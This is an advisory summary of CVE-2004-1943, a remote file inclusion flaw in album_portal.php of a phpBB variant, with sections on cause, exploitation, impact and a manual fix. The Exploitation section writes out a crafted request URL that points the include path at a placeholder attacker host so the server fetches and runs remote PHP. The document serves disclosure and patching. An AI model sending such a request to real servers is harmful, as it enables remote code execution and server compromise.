CVE-2004-1943

Vulnerability

The vulnerability exists in album_portal.php of phpBB modified by Przemo version 1.8. The script does not properly sanitize the $phpbb_root_path variable before using it in an include() statement. Specifically, the code $album_root_path = $phpbb_root_path . 'album_mod/'; include($album_root_path . 'album_common.'.$phpEx); allows an attacker to control the path by setting phpbb_root_path to an external URL. This leads to remote file inclusion (RFI) of arbitrary PHP code. The vulnerable code is reachable when the album_portal.php file is accessed without proper initialization of $phpbb_root_path. [1]

Exploitation

An attacker can exploit this by sending a crafted HTTP request to the victim's server: http://[victim_host]/album_portal.php?phpbb_root_path=http://[evil_host]/&phpEx=/../../[evil_file.php]. The attacker must host a malicious PHP file on an external server. No authentication is required; the vulnerability is accessible to any remote attacker. The phpEx parameter is also used to manipulate the file extension. [1]

Impact

Successful exploitation allows the attacker to execute arbitrary PHP code on the web server with the privileges of the web server user. This can lead to full compromise of the web application, including data theft, defacement, or further server-side attacks. The impact is considered medium severity due to the potential for arbitrary code execution. [1]

Mitigation

The vendor was not contacted at the time of disclosure. A fix is provided in the advisory: modify album_portal.php to define IN_PHPBB and set $phpbb_root_path = './' before including files. This prevents external inclusion by hardcoding the root path. Users should apply this patch or upgrade to a patched version if available. No official patch from the vendor is mentioned; the fix is a manual code change. [1]